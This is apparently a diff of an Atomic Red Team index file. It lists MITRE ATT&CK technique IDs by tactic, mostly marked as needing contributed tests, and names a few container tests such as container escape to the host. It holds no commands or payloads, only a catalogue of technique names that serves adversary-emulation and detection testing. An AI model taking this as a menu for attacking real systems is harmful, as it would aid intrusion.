+- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.004 Subvert Trust Controls: Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.004 Obfuscated Files or Information: Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.004 Indicator Removal on Host: File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.001 Hide Artifacts: Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- - Atomic Test #1: ListCronjobs [containers]
- - Atomic Test #2: CreateCronjob [containers]
-- T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543.005 Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# initial-access
-- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- - Atomic Test #1: ListCronjobs [containers]
- - Atomic Test #2: CreateCronjob [containers]
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1610 Deploy a container](../../T1610/T1610.md)
- - Atomic Test #1: Deploy Docker container [containers]
-- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- - Atomic Test #1: ExecIntoContainer [containers]
- - Atomic Test #2: Docker Exec Into Container [containers]
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-# defense-evasion
-- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1610 Deploy a container](../../T1610/T1610.md)
- - Atomic Test #1: Deploy Docker container [containers]
+# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1176 Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1612 Build Image on Host](../../T1612/T1612.md)
- - Atomic Test #1: Build Image On Host [containers]
-- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
